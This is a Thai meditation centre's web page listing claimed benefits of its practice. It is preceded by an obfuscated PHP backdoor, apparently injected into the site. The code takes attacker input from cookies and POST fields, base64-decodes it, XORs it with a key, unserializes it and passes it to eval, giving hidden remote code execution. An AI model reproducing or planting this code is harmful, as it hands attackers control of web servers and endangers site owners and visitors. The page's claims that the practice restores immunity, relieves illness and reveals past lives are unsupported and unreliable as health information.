$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} ประโยชน์ที่ได้รับ | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

เป็นการเจริญสติเพื่อรู้เท่าทัน รูป นาม ที่เกิดดับเร็วมาก เพื่อหยุดกระแสการขับเคลื่อนของขันธ์ 5 ทำให้เห็นกฎพระไตรลักษณ์

 ช่วยขับเคลื่อนกระแสลมปราณ ปรับธาตุ 4 คือ ดิน น้ำ ลม ไฟ ในร่างกายให้เกิดความสมดุล ทำให้ภูมิคุ้มกันโรค โดยธรรมชาติฟื้นขึ้น
บรรเทาอาการของโรคภัยไข้เจ็บ ทั้งนี้ทั้งนั้นก็ขึ้นอยู่กับกำลังใจ และความขยันหมั่นเพียรของผู้ปฏิบัติเป็นสำคัญ

 สามารถใช้ฐานทั้ง 4 คือ กาย เวทนา จิต ธรรม มาเป็นฐานที่ตั้งแห่งการเจริญสติ พัฒนาไปสู่มหาสติปัฏฐาน โดยรวมธาตุทั้ง 4 ให้เป็นหนึ่งเดียว
เข้าไปสู่การระลึกชาติและกระแสกรรมในอดีต ได้เรียนรู้สัมผัสประสบการณ์จริงในอดีตทำให้เกิดปัญญาที่แท้จริง

 เมื่อรู้ความจริงตามธรรมชาติว่าทุกอย่างเป็น อนิจจัง ทุกขัง อนัตตา เกิดขึ้น ตั้งอยู่ สลาย ไม่จีรังยั่งยืน ไม่ใช่ตน ไม่ใช่ของๆตน ทุกอย่างเป็นแค่สมมุติ
จิตจึงจางคลายความยึดมั่นถือมั่น จึงเป็นบ่อเกิดของความทุกข์ ทำให้พ้นทุกข์ได้

 ทำให้เกิดความสงบทางด้านจิตใจ ร่างกาย และเกิดความผ่อนคลาย

 เข้าถึงกล่องปัญญาที่แท้จริง (จิต)

 หลุดพ้นจากกิเลสและตัญหาทั้งปวง

 ทำให้จิตหลุดพ้นจากสภาวะปรุงแต่งจาก รูป เสียง กลิ่น รส สัมผัส อารมณ์ (ดวงตาเห็นธรรม)

 วิ่ง วน เหวี่ยง วาง ว่าง เป้าหมายคือพ้นทุกข์